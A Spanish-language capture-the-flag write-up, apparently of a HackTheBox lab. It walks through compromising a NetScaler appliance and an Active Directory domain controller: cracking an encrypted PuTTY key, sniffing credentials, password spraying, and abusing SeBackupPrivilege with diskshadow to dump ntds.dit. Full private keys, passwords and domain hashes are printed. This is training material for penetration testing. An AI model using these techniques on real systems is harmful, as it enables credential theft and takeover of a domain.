❯ cat flag.txt
XEN{l364cy_5pn5_ftw}


Camouflage

XEN{bu7_ld4p5_15_4_h455l3}


De antes sabiamos que habia una máquina linux la cual correspondia a la .202, al escanear sus puertos con nmap encontramos un servicio ssh y un servicio http

❯ nmap -sT -T5 -n -Pn 172.16.249.202  
Nmap scan report for 172.16.249.202
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
443/tcp  open  https
3011/tcp open  trusted-web

Al abrirla la página web encontramos un simple panel de login de NetScaler

De nuevo podemos reutilizar las credenciales de pmorgan ya que son válidas

Al hacerlo accedemos a lo que parece un dashboard de usuario, despues de buscar en la web nos damos cuenta que no hay nada realmente interesante para nosotros

Tenemos credenciales válidas, en este caso las del usuario mturner que hemos encontrado antes son válidas para el login de ssh, aunque no nos da una shell

❯ ssh mturner@172.16.249.202
###############################################################################
#                                                                             #
#        WARNING: Access to this system is for authorized users only          #
#         Disconnect IMMEDIATELY if you are not an authorized user!           #
#                                                                             #
###############################################################################  

(mturner@172.16.249.202) Password: 4install!
Last login: Sun Apr 16 01:39:17 2023 from 172.16.249.204
 Done
>

Leyendo un poco la documentación de NetScaler podemos ver que existe un comando shell que nos otorgaria una consola pero mturner no esta autorizado

> shell
ERROR: Not authorized to execute this command [shell]
>

Volvamos a los archivos que hemos descargado, tenemos uno llamado private.ppk

❯ cat private.ppk
PuTTY-User-Key-File-2: ssh-rsa
Encryption: aes256-cbc
Comment: imported-openssh-key
Public-Lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQDR1rakYMB+9++bNXo/Rda/7dhII8lzQt+n
ixND2S30rtBz+ROW/UqKqTX8lRZ3zlMFKQT514RomVq0ec6gEoKVGZQRsc+S4aaL
AAnLp4ENGT3Gk9AeHgDxJ2eyBFnzMmO07gInwFzEPCLTT7caJAYGuMFdxgAsU6BX
Y49Tv578krpGNz0C58V6YH+u8/AIVXfhmXdwGuY921NDUHogjRGsoxQi9jDffOx+
zOuxfm7nMRYGDWLZO5HNjhanQt0rj9EK+70zJcFb1CDub9EEmwb/DDZB5zCytx90
69mql7SFg7D0K1tm0LicrwZMDJuYf87P5MFdBEnsO3Oay1lsRFZz
Private-Lines: 14
LbxnKlBkUZLxSGo2vSU375iM6kDpQuIE8S5G+azqGT0FziA/lr40gyj2IipKZqe/
DZRbPNcrerJQDE9xg1qTqnKShjnRvUi+I5ClTvn7UrYt2HAfds/Tl61zRhJ3YXnu
dkw3fTfo63OvBPwRpYQtpj5yFbHtUR8wY+2RBNcS/plU2kretGTRbZJkV9+1U7Vz
Uk2JZfua5VkTuCw7DqKRoAjR28p1UKhpIoztG6MKtNtR1HeUL3y2oQbOzLNJhz0m
F9sn/wBTdPQN5ZB76ERlH0fAugi7YeuxwFxctnUNoeA3+APH3kzeP9uRLsBwdn0r
ayZr/yihzFMlQ7VgcjI9uE2sMnScaEk094FWuj6gjPZqoqzAWhXP/71VEWbOg+gj
s6nBhJB9f4mUEHy8SOlbIK/Q3Es/VAaYiQchSXEsPhHdGC2J511TudjggmCFsCVP
tf6mzyS+8SA23dE8L3V5S5/Y8IDEcvLWaxDsV6Xjd4PGBgMLp10FJYajo9m61GdB
4ffBBqI5sOZK0Gb27AemRSyo0vA5EoM3YUOeKqm5xlNIalrTHI10SKD9tTC8UPLJ
1fbbmJ+eQagw/PefzHQ9cavnU5x98+PjeougVBbkZBGBAqUP0cLV1hWKaOlkqHP5
+m+fLhviWCbNj2FNEFse04NNlbSBgHrF//fVQbFIbSnMsJ/BkDZ5rVxpHG8aq9my
l9a0d97470iNp8drQKuKGRlzbe/TA8NQQaO5/My28kPbLqLcaTJKNZe8rvvU4Cj4
n+76s8XHhONvtAUrULiGHyAM2aMQXwUM5rCju7t6hdpy5h8HTgdys35MRM2DdvtD
+SfIoAmXu1V1xQrQJbDlStVM9l5z6C+pzmtv26jXebl8821pI6xJJHW02dZDAskl  
Private-MAC: 27a161c329fc67b51d27efcaf3221099748934a9

Con puttygen en teoria deberiamos poder generar una clave privada pero rsa de ssh, al hacerlo nos pide una contraseña ya que la clave putty esta cifrada

❯ puttygen private.ppk -O private-openssh -o private.key  
Enter passphrase to load key:
puttygen: error loading `private.ppk': wrong passphrase

Para obtener la contraseña con putty2john generamos un hash para john el cual al intentarlo crackear con el rockyou.txt no conseguimos romper por fuerza bruta

❯ putty2john private.ppk > hash

❯ john -w:/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PuTTY, Private Key (RSA/DSA/ECDSA/ED25519) [SHA1/AES 32/64])  
Press 'q' or Ctrl-C to abort, almost any other key for status
Session completed.

Podemos usar kwprocessor para crear un diccionario que se base en mapas y patrones de ruta del teclado en este caso utilizando la distribución ingles

❯ ./kwp basechars/full.base keymaps/en-us.keymap routes/2-to-16-max-3-direction-changes.route > passwords.txt  

Al probar fuerza bruta con el diccionario generado por kwprocessor, john logra romper el hash de la clave putty y podemos ver la contraseña en texto claro

❯ john -w:passwords.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PuTTY, Private Key (RSA/DSA/ECDSA/ED25519) [SHA1/AES 32/64])  
Press 'q' or Ctrl-C to abort, almost any other key for status
=-09876567890-=- (private)
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Ahora usando puttygen podemos generar la clave ssh-rsa y guardarla como private.key, sin embargo es una clave cifrada y nos pedira la contraseña

❯ puttygen private.ppk -O private-openssh -o private.key  
Enter passphrase to load key: =-09876567890-=-

❯ cat private.key 
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,BDD46DBFD4AD749C

4yyyT+aTaYhDqaYUKEu5wcaUEUM4N5GWWzyIrQ7WNZNCBaZ2pEspcWGg3k+/qVjw
Qbdl3d6X87lFWYmj1fREzNL15ZazeBWqkKtGzhDkoIbFb4dX0Grn2c0gO0Qn50dh
OrBVUP8tYehOAkgszpfKEWeZzbh6ohQRmQnDYhoVHKvmXhE8bHUlVGikdLY8cXhD
AN7e5bGze06vpzlkYXgcGyUek4WFLMBaYTIpqvk18Qz1iRIuqqNzfr6xsxxsuNLg
qyDV64+4jDR1yxLDbH0Ht7B8EIHf4yv7Tt6E+TSDntD5vDw1tBxA0RuqQk1Cot+N
4XaqWk2eemM2MnyTPTqOUtKRgddlx1nwGlj4ntz3Mbpzjoy2eV6AzhznekE72WLp
MGHTGFELU175nEc/hyGHu++VFWvSAu1kJ4PhfVRCR02iYfGK9LqcOJ+IIRvXUzlI
hbNXO/l/k9vk+QeuHR9g3hUs56MxBV22HXkchR8o/jEEBVy2ZkGaec5MTsBKqU+M
8XWqPxZ+hKim+bbycu6Cumdxcc7C2saxpciSQHvGsPGTEXrnu3WfvuCWu8mTJnn5
jXT+zslZO8Wc6tPKkwAf3ZsftrH98Qmxocob5jhgvM4bATBnUcnQ3bLedtKCICr1
Y0ZiCZrSyWv/asStw3d3sxqcWoPGu0XXSomVQcGHXAUzShue6FPnPMbP3zWVo+Zn
0Qcar4YKaGkRWQiCydc1g0CUGUdCltcw4fYsa3a7mJfvrCsq0U/AquvDawJ93B9B
HGvFEdAxEiBi3bpnD8vWE2oHkAk/4YZ9NYp5cw1xI93o7gPhOCLi4N+MhS35LapU
S01MqDkGhkDw/DndpSBKebQ+lhyDOMRDSiHtPVf5a2iVharJ9wIbIAaX4OIOBaEc
fIJxM5SREJfFX28E4ra2sj2d4By2FmATpWVUFnIjFR42T8VqaD5XwkvMQ4YzBBzO
Jx5+cGvjg2ajkguCEuoq3Giev/sdtV39MZeLmRswRV/JVmT730j/lF6DR34iqvBT
Dv2LEfqyqcGktYlHb5oK7x9YPO1lRdlExUl7ObdWe3xsnpFh5UUmoPD6SfJ78mY5
MpHF09B6nnj7vDgbkinIfdIV3pRMEVPk7JuKpkkbQ+7KDyLCDriGmFgC1Vk/woIQ
mhHGkrxWHF2iAjKYsL0JveTCA9IGSoWSB/00QvbZm0gX7Lu4KALtqgQI1IjiCdGQ
vHvrevRs6/FzHKXtbNqcSKtTvSqKs5x22yLt2y54kEzWuj5Po0KOBBs7F3GXOBbt
cGb+iA4D3C2SnZ18+5RmpIw7CXuwbtUpjWAUj8ssf3F14Cg8mifYArpiC9OQufqz
TKMawdcMMbSfeibyqUqm1guzBneNW96OziPMWoW/oKN3K4zRLl+bXl1hQN5xXjii
mqQMirEXtE9wsHwZOxNe/UqzbBgYS8Iug6PFwI2v8f4xTjSRMgXH7JhjhkF/xIY1
z303BmJqQ+hlnkbicfCeAktq4CZcInP91lgtAc6Sbm9Pfje9/b2yTq/MPZSrOQd8  
5GDqSjIziT5tWesljwyAs4KoZNRgakrbD5jJAk97+UoBxR/+kdfyNA==
-----END RSA PRIVATE KEY-----

Podemos solucionar esto facilmente generando una nueva clave con openssl, la guardamos como id_rsa, le pasamos la contraseña y tenemos una clave normal

❯ openssl rsa -in private.key > id_rsa
Enter pass phrase for private.key: =-09876567890-=-  
writing RSA key

❯ cat id_rsa    
-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDR1rakYMB+9++b
NXo/Rda/7dhII8lzQt+nixND2S30rtBz+ROW/UqKqTX8lRZ3zlMFKQT514RomVq0
ec6gEoKVGZQRsc+S4aaLAAnLp4ENGT3Gk9AeHgDxJ2eyBFnzMmO07gInwFzEPCLT
T7caJAYGuMFdxgAsU6BXY49Tv578krpGNz0C58V6YH+u8/AIVXfhmXdwGuY921ND
UHogjRGsoxQi9jDffOx+zOuxfm7nMRYGDWLZO5HNjhanQt0rj9EK+70zJcFb1CDu
b9EEmwb/DDZB5zCytx9069mql7SFg7D0K1tm0LicrwZMDJuYf87P5MFdBEnsO3Oa
y1lsRFZzAgMBAAECggEASI9cnL6wEbeebScy3IpD1h5iuZ9WW7r2J7NZuA5za7a/
cjrg4Uc47XXRq0PKfycjYhdrFxHFQX419U5hesyrxu8PWocH5hyNQGeE+50ybNsb
l30pbCCn5rvfiZkjmYsFG11p9WD5MwowaK2Z/ToTs2NTyh9bk/he65kLyMPsMB3U
Jx2bqsZZmhsxiRfyi7TFx3n7eBL12U8SN/36N1eBJSMq8UanMvP0Ce3R6LpsAngc
HD33479bSDG/1tzvRD1UbRCBIhIRFcvDOvs07pVHBnE8rGsczkALXBYIBhxg34CV
NvwWgbYkYMfGKCKINtoT/K3sJgojAAYsmN5lEOmEYQKBgQD1tqOApMAtdekqO612
e7VWRm2ggGALkwwiissH9Sl1FGGwn+GVdpjcb0Xh5zbTJv5BLCCZwfe+JLEzpk49
fnOcSxH6sJX2nBw7OQyADmR5GWfqtf/tO7V+2FSZApyKNEqAArO/KtsIjVS+lJxU
ZxxstKrS0hUN+eDVRcgrPAYcqQKBgQDan5kgbWeYX6/u2k4Al0ZDOLbSArP8nwz2
8FLQHk+citTrW6kVCBzOC6prqAZxMsQHhex3vLLWLCk6S7TpC23CRF1diTDA1QlV
Q4mW7y8xhJRsG1NPvXD9/JKBvqMh3m9iJ8nU4HlKUFP9Hani0dbvtcM99QcJCwjk
m1U3R1OPuwKBgCcoL+40Uxvrinjcgcw78q4JEzdcvfGaQXjPvYNLIowx70+CaySy
fbHDWdOiUS5dLG+eZKOcMarvlf2xJw7NtAbYP8k/kuZ2Alm9waw2nvRdhB33Ww2n
UkkgmHq529B6fNThmVuBrN40B6lHbZJVzEXWlNJ8ADb190qFkFyzeBXhAoGBAMcm
CQP8BRlNWOMYY2OwaWXEnOzzX2dorxOm2ZkRc23jHY+DwKMS78JV6BkHR08Icn9z
5HMyJiposemTmymKqqIDSpVw6kNODKFp00T1fqT544YS4jJKHEqRMBgWQ14P1KCy
I+3RyUsDn257/gxLICLeDQs8T/tR3Pj58odXZuwPAoGABxpye3AQbW68nkBFfkRc
7ajASJccAAZ9NPgc2jNFMWMX2TKapVL1QzL0ExFlrtoBVd5CiEyxmlTaPUDV6pha
0H3ftlh4tGmFsgmcZ+TZ5x1i/xzypSxcKieov9ufp1W2kVLDu8lghn1t9IS/cP4m  
jh0vjD4+lmnAXWJ5kRpHa40=
-----END PRIVATE KEY-----

Lo que se nos podria ocurrir es que la clave rsa privada pertenece al usuario root y podriamos conectarnos sin contraseña, sin embargo al intentarlo no funciona

❯ ssh root@172.16.249.202 -i id_rsa
###############################################################################
#                                                                             #
#        WARNING: Access to this system is for authorized users only          #
#         Disconnect IMMEDIATELY if you are not an authorized user!           #
#                                                                             #
###############################################################################  

(root@172.16.249.202) Password:

Leyendo mas documentación de NetScaler encontramos que el usuario privilegiado no es root sino nsroot, nos conectamos por ssh y ahora podemos utilizar shell

❯ ssh nsroot@172.16.249.202 -i id_rsa
###############################################################################
#                                                                             #
#        WARNING: Access to this system is for authorized users only          #
#         Disconnect IMMEDIATELY if you are not an authorized user!           #
#                                                                             #
###############################################################################  

Last login: Tue Apr 25 17:13:15 2023 from 172.16.249.205
 Done
> shell
Copyright (c) 1992-2013 The FreeBSD Project.
Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994
        The Regents of the University of California. All rights reserved.

root@netscaler:~# id
uid=0(root) gid=0(wheel) groups=0(wheel),20(operator)
root@netscaler:~#

Somos root, con tcpdump podemos interceptar un poco de trafico omitiendo el puerto 22 ya que es trafico ssh que no nos servira de mucho en este caso

root@netscaler:~# tcpdump -i 1 -w capture.pcap -s 0 'not port 22'
tcpdump: listening on 0/1, link-type EN10MB (Ethernet), capture size 65535 bytes  
^C
5843 packets captured
5979 packets received by filter
0 packets dropped by kernel
root@netscaler:~#

Aprovechando la conexión ssh podemos usar scp para descargar el archivo de captura y asi analizar todas las peticiones localmente en nuestro equipo

❯ scp -i id_rsa nsroot@172.16.249.202:/root/capture.pcap .
###############################################################################
#                                                                             #
#        WARNING: Access to this system is for authorized users only          #
#         Disconnect IMMEDIATELY if you are not an authorized user!           #
#                                                                             #
###############################################################################  

capture.pcap                                      100%  678KB 569.4KB/s   00:01

Al abrir el archivo de captura con wireshark y filtrar por trafico http encontramos la primera petición hacia /login/do que como contraseña esta enviando la flag


Doppelgänger

XEN{y_5h4r3d_p@55w0Rd5?}


Filtrando por peticiones ldap encontramos una petición bajo el OU Service Accounts la cual tramita una autenticación usando la contraseña #S3rvice#@cc

Reutilizando las credenciales de mturner que conseguimos antes dumpeamos todos los usuarios del dominio, vemos varios usuarios que terminan en -svc

❯ crackmapexec smb 172.16.249.200 -u mturner -p 4install! --users
SMB         172.16.249.200  445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:htb.local) (signing:True) (SMBv1:False)  
SMB         172.16.249.200  445    DC               [+] htb.local\mturner:4install!
SMB         172.16.249.200  445    DC               [+] Enumerated domain user(s)
SMB         172.16.249.200  445    DC               htb.local\netscaler-svc                  badpwdcount: 0 desc:
SMB         172.16.249.200  445    DC               htb.local\test-svc                       badpwdcount: 1 desc:
SMB         172.16.249.200  445    DC               htb.local\backup-svc                     badpwdcount: 0 desc:
SMB         172.16.249.200  445    DC               htb.local\anagy                          badpwdcount: 1 desc:
SMB         172.16.249.200  445    DC               htb.local\cmeller                        badpwdcount: 0 desc:
SMB         172.16.249.200  445    DC               htb.local\fboucher                       badpwdcount: 1 desc:
SMB         172.16.249.200  445    DC               htb.local\rdrew                          badpwdcount: 1 desc:
SMB         172.16.249.200  445    DC               htb.local\urquarti                       badpwdcount: 1 desc:
SMB         172.16.249.200  445    DC               htb.local\rprakash                       badpwdcount: 1 desc:
SMB         172.16.249.200  445    DC               htb.local\app-svc                        badpwdcount: 1 desc:
SMB         172.16.249.200  445    DC               htb.local\mturner                        badpwdcount: 0 desc:
SMB         172.16.249.200  445    DC               htb.local\mssql-svc                      badpwdcount: 0 desc:
SMB         172.16.249.200  445    DC               htb.local\print-svc                      badpwdcount: 0 desc:
SMB         172.16.249.200  445    DC               htb.local\xenserver-svc                  badpwdcount: 0 desc:
SMB         172.16.249.200  445    DC               htb.local\awardel                        badpwdcount: 0 desc:
SMB         172.16.249.200  445    DC               htb.local\pmorgan                        badpwdcount: 0 desc:
SMB         172.16.249.200  445    DC               htb.local\jmendes                        badpwdcount: 0 desc:
SMB         172.16.249.200  445    DC               htb.local\alarsson                       badpwdcount: 0 desc:
SMB         172.16.249.200  445    DC               htb.local\krbtgt                         badpwdcount: 1 desc: 
SMB         172.16.249.200  445    DC               htb.local\Guest                          badpwdcount: 1 desc: 
SMB         172.16.249.200  445    DC               htb.local\Administrator                  badpwdcount: 0 desc:

La contraseña era para cuentas se servicio asi que podemos aplicar un password spray con todos los usuarios que terminan en -svc, hay varios usuarios validos

❯ crackmapexec smb 172.16.249.200 -u users.txt -p #S3rvice#@cc --continue-on-success
SMB         172.16.249.200  445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:htb.local) (signing:True) (SMBv1:False)  
SMB         172.16.249.200  445    DC               [+] htb.local\netscaler-svc:#S3rvice#@cc
SMB         172.16.249.200  445    DC               [-] htb.local\test-svc:#S3rvice#@cc STATUS_LOGON_FAILURE
SMB         172.16.249.200  445    DC               [+] htb.local\backup-svc:#S3rvice#@cc
SMB         172.16.249.200  445    DC               [-] htb.local\app-svc:#S3rvice#@cc STATUS_LOGON_FAILURE
SMB         172.16.249.200  445    DC               [+] htb.local\mssql-svc:#S3rvice#@cc
SMB         172.16.249.200  445    DC               [+] htb.local\print-svc:#S3rvice#@cc
SMB         172.16.249.200  445    DC               [+] htb.local\xenserver-svc:#S3rvice#@cc
SMB         172.16.249.200  445    DC               [-] htb.local\:#S3rvice#@cc STATUS_LOGON_FAILURE

Sin embargo si escaneamos los puertos del Domain Controller haciendo uso de nmap ademas del clasico smb podemos ver activo el puerto 5985 que es winrm

❯ nmap -sT -T5 -n -Pn 172.16.249.200  
Nmap scan report for 172.16.249.200
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3389/tcp open  ms-wbt-server
5985/tcp open  wsman

Si revisamos en la información de bloodhound todo los usuarios que pertenecen al grupo Remote Management Users solo encontramos al usuario backup-svc en el

Ya que tiene el privilegio y tenemos su contraseña con evil-winrm podemos conectarnos y obtener una powershell en el DC con el usuario backup-svc

❯ evil-winrm -i 172.16.249.200 -u backup-svc -p #S3rvice#@cc  
PS C:\Users\backup-svc\Documents> whoami
htb\backup-svc
PS C:\Users\backup-svc\Documents> type ..\Desktop\flag.txt
XEN{y_5h4r3d_p@55w0Rd5?}
PS C:\Users\backup-svc\Documents>


Owned

XEN{d3r1v471v3_d0m41n_4dm1n}


Entre los grupos a los que pertenece backup-svc en bloodhound podemos ver que esta Remote Desktop Users que nos permite también conectarnos por RDP

Haciendo uso de xfreerdp y las credenciales que tenemos nos conectamos

❯ xfreerdp /u:backup-svc /p:#S3rvice#@cc /v:172.16.249.200 /cert:ignore  

Entre los privilegios que tiene el usuario backup-svc esta uno que llama bastante la atanción y este es SeBackupPrivilege que permite crear backups del disco

PS C:\Users\backup-svc\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======  
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

PS C:\Users\backup-svc\Documents>

Usando diskshadow desde la sesión de RDP podemos crear un tipo de backup de toda la unidad C: con el alias xyz el cual vamos a exponer con la unidad X:

PS C:\Users\backup-svc> diskshadow
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC,  4/25/2023 5:40:20 PM

DISKSHADOW> set context persistent nowriters

DISKSHADOW> add volume C: alias xyz

DISKSHADOW> set metadata C:\ProgramData\xyz.cab

DISKSHADOW> create
Alias xyz for shadow ID {99d84211-b50c-47f6-951b-d0f728bd0b1e} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {f443e047-dbf4-4de0-867f-1156f9ae0a49} set as environment variable.  

Querying all shadow copies with the shadow copy set ID {f443e047-dbf4-4de0-867f-1156f9ae0a49}

        * Shadow copy ID = {99d84211-b50c-47f6-951b-d0f728bd0b1e}               %xyz%
                - Shadow copy set: {f443e047-dbf4-4de0-867f-1156f9ae0a49}       %VSS_SHADOW_SET%
                - Original count of shadow copies = 1
                - Original volume name: \\?\Volume{78d1dcbd-51bd-4ccf-907c-aa32152ad3f2}\ [C:\]
                - Creation time: 4/25/2023 5:41:05 PM
                - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
                - Originating machine: DC.htb.local
                - Service machine: DC.htb.local
                - Not exposed
                - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1

DISKSHADOW> expose %xyz% X:
-> %xyz% = {99d84211-b50c-47f6-951b-d0f728bd0b1e}
The shadow copy was successfully exposed as X:\.

DISKSHADOW>

Con la función upload incluida en evil-winrm podemos subir un par de dlls que nos ayudaran a explotar este privilegio, después los importamos como modulos

PS C:\ProgramData> upload SeBackupPrivilegeCmdLets.dll

Info: Uploading SeBackupPrivilegeCmdLets.dll to C:\Users\backup-svc\Documents\SeBackupPrivilegeCmdLets.dll  

Data: 16384 bytes of 16384 bytes copied

Info: Upload successful!

PS C:\ProgramData> upload SeBackupPrivilegeUtils.dll

Info: Uploading SeBackupPrivilegeUtils.dll to C:\Users\backup-svc\Documents\SeBackupPrivilegeUtils.dll

Data: 21844 bytes of 21844 bytes copied

Info: Upload successful!

PS C:\ProgramData> Import-Module .\SeBackupPrivilegeUtils.dll
PS C:\ProgramData> Import-Module .\SeBackupPrivilegeCmdLets.dll
PS C:\ProgramData>

Ahora copiamos los archivos ntds.dit que contiene los hashes de todos los usuarios del dominio y SYSTEM de la copia creada accediendo desde la unidad X:

PS C:\ProgramData> Copy-FileSeBackupPrivilege X:\Windows\NTDS\ntds.dit ntds.dit
PS C:\ProgramData> Copy-FileSeBackupPrivilege X:\Windows\System32\Config\SYSTEM SYSTEM  

Podemos conectarnos con smbclient de impacket y usando el recurso C$, entrar a la carpeta ProgramData donde tenemos nuestros archivos y descargarlos con get

❯ impacket-smbclient htb.local/backup-svc:#S3rvice#@cc@172.16.249.200  
Impacket v0.11.0 - Copyright 2023 Fortra

Type help for list of commands
# use C$
# cd ProgramData
# get ntds.dit
# get SYSTEM
#

Ahora en local con la herramienta secretsdump de impacket, le pasamos el SYSTEM y el ntds.dit que hemos descargado dumpeamos todos los hashes del dominio

❯ impacket-secretsdump LOCAL -system SYSTEM -ntds ntds.dit
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x6e398137ec7f2e204671dad7c778509f
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 4a62a0ac1475b54add921ac8c1b72e31
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:822601ccd7155f47cd955b94af1558be:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:5e507509602e1b651759527b87b6c347:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3791ca8d70c9e1d2d2c7c5b5c7c253e8:::
CITRIX$:1103:aad3b435b51404eeaad3b435b51404ee:fd981d0c915932bb3ddf38b415c49121:::
htb.local\alarsson:1104:aad3b435b51404eeaad3b435b51404ee:92a44f1aa6259c55f9f514fabae5cc3f:::
htb.local\jmendes:1106:aad3b435b51404eeaad3b435b51404ee:10d0c05f7d958955f0eaf1479b5124a0:::
htb.local\pmorgan:1107:aad3b435b51404eeaad3b435b51404ee:8618ba932416a7404a854b250bf28577:::
htb.local\awardel:1108:aad3b435b51404eeaad3b435b51404ee:270e4d446437f4383b092b42a9f88f0a:::
VDESKTOP3$:1109:aad3b435b51404eeaad3b435b51404ee:e582f9b9d77dae6357bb574620b721ce:::
VDESKTOP2$:1110:aad3b435b51404eeaad3b435b51404ee:f583f9b5fc860b9ae21e482caaad0553:::
VDESKTOP1$:1111:aad3b435b51404eeaad3b435b51404ee:f96d793a4b9d2b8517123ad8d1e26b03:::
htb.local\xenserver-svc:1112:aad3b435b51404eeaad3b435b51404ee:ffc86906b87839a80c9a5df66fd39452:::
htb.local\print-svc:1113:aad3b435b51404eeaad3b435b51404ee:ffc86906b87839a80c9a5df66fd39452:::
htb.local\mssql-svc:1115:aad3b435b51404eeaad3b435b51404ee:ffc86906b87839a80c9a5df66fd39452:::
htb.local\mturner:1117:aad3b435b51404eeaad3b435b51404ee:330e8573172989af7b756c4b831d7788:::
htb.local\app-svc:1118:aad3b435b51404eeaad3b435b51404ee:feabcb5e62391216ff8ba2bbf487298b:::
htb.local\rprakash:1119:aad3b435b51404eeaad3b435b51404ee:64b49f377000aa5e512625de928e6a05:::
LAPTOP1$:1120:aad3b435b51404eeaad3b435b51404ee:fafcb53e7c9e126632dee80a69a6bc40:::
LAPTOP2$:1121:aad3b435b51404eeaad3b435b51404ee:a898f3e4f7766d961f1c93d96e52821e:::
LAPTOP3$:1122:aad3b435b51404eeaad3b435b51404ee:ff9313db8ceebfb0e37be27dcbda8011:::
LAPTOP5$:1123:aad3b435b51404eeaad3b435b51404ee:bb0e3fae33f0f5fa0149e0eca3ea8802:::
LAPTOP6$:1124:aad3b435b51404eeaad3b435b51404ee:fb6667b6521fcb2e3c8ab72688e560d1:::
htb.local\urquarti:1125:aad3b435b51404eeaad3b435b51404ee:182bc93cf09b8c0f5061facd4976f664:::
htb.local\rdrew:1137:aad3b435b51404eeaad3b435b51404ee:22cb6094730daf99418dc0373ed0a46e:::
htb.local\fboucher:1138:aad3b435b51404eeaad3b435b51404ee:7f2dca6c6f0865f8955e720063a98f4c:::
htb.local\cmeller:1139:aad3b435b51404eeaad3b435b51404ee:be5d31e3ee91641b2f4d5ad7da384c4b:::
htb.local\anagy:1140:aad3b435b51404eeaad3b435b51404ee:b53e1fc07b17a1dd5637db069ce81f67:::
WK01$:1142:aad3b435b51404eeaad3b435b51404ee:e7ef2a5d6ae326424d8f4b936fe8a129:::
WK02$:1143:aad3b435b51404eeaad3b435b51404ee:e55fbb54432c61dea5f21874a342583d:::
WK03$:1144:aad3b435b51404eeaad3b435b51404ee:acbf68032188283bfdaadea761b9a700:::
WK04$:1145:aad3b435b51404eeaad3b435b51404ee:ecbbb4c9d9b1817aaaa47f3bebcec950:::
WK05$:1146:aad3b435b51404eeaad3b435b51404ee:1b4e60ea2d87ec132336aa0cb06cb58c:::
WK06$:1147:aad3b435b51404eeaad3b435b51404ee:2c17c9ff7dd85996f1078a12eb469f4a:::
WK07$:1149:aad3b435b51404eeaad3b435b51404ee:cc2413c14387878386b6a9d62f75f72e:::
WK09$:1150:aad3b435b51404eeaad3b435b51404ee:1e0a5fed55e52312227b5769013fa7e9:::
htb.local\backup-svc:1151:aad3b435b51404eeaad3b435b51404ee:ffc86906b87839a80c9a5df66fd39452:::
htb.local\test-svc:1152:aad3b435b51404eeaad3b435b51404ee:4e36a1854ae7cc3681b6168fe5906e45:::
htb.local\netscaler-svc:1602:aad3b435b51404eeaad3b435b51404ee:ffc86906b87839a80c9a5df66fd39452:::
[*] Kerberos keys from ntds.dit 
Administrator:aes256-cts-hmac-sha1-96:eeae682fea0120839f5cf840279b650a223418a334861b32001dbaab7060b0cb
Administrator:aes128-cts-hmac-sha1-96:4e77eb212c9c89234d061171eb981b92
Administrator:des-cbc-md5:2ac7b38ff1a48f67
DC$:aes256-cts-hmac-sha1-96:61d67418b4a65e6b6161b86fcd1abfe55b0e4f2f5d8efb339816b67825082e9f
DC$:aes128-cts-hmac-sha1-96:38a2a2858c324ab9993eedf9b9bed4f3
DC$:des-cbc-md5:ad6452c4072c57d9
krbtgt:aes256-cts-hmac-sha1-96:a67001bfb6c76224f2156450518191893c84d3cb6cee2956ef2659635a692458
krbtgt:aes128-cts-hmac-sha1-96:2f187b734a44d3344028d9c50de6d45c
krbtgt:des-cbc-md5:7675192346f80864
CITRIX$:aes256-cts-hmac-sha1-96:72eb6b137275e892b09fc74714ea068512a7c8b2adc2e24f260e8e76783e29c7
CITRIX$:aes128-cts-hmac-sha1-96:7c96d2b6f85994f52f9b14e18bf73618
CITRIX$:des-cbc-md5:3468c72cb58f547a
htb.local\alarsson:aes256-cts-hmac-sha1-96:2e7be1f105bcd413783a682a27ec6e3424c1a93a507b831a4b75e1efca570e78
htb.local\alarsson:aes128-cts-hmac-sha1-96:53db5c1a232a02eb7ceeb620650d730c
htb.local\alarsson:des-cbc-md5:e068792fe58c37ea
htb.local\jmendes:aes256-cts-hmac-sha1-96:d91d10c9f00b17f3e3d29dee98af067c19884da47ec34b8f33750a74ca0410ee
htb.local\jmendes:aes128-cts-hmac-sha1-96:ad976084f2d76cc6527b623a42f878ef
htb.local\jmendes:des-cbc-md5:2638f87697cde61f
htb.local\pmorgan:aes256-cts-hmac-sha1-96:fafd1c2483f05d20ea355448192719b6aca35fec1ef975b5a5c624de43c01ba3
htb.local\pmorgan:aes128-cts-hmac-sha1-96:90e2852e2c2357dcb43735a46a01e9f3
htb.local\pmorgan:des-cbc-md5:5773647cfbece580
htb.local\awardel:aes256-cts-hmac-sha1-96:f4135a5898349631bbf9976776615c5b2369ae0d00c7f91af6348a202a93666f
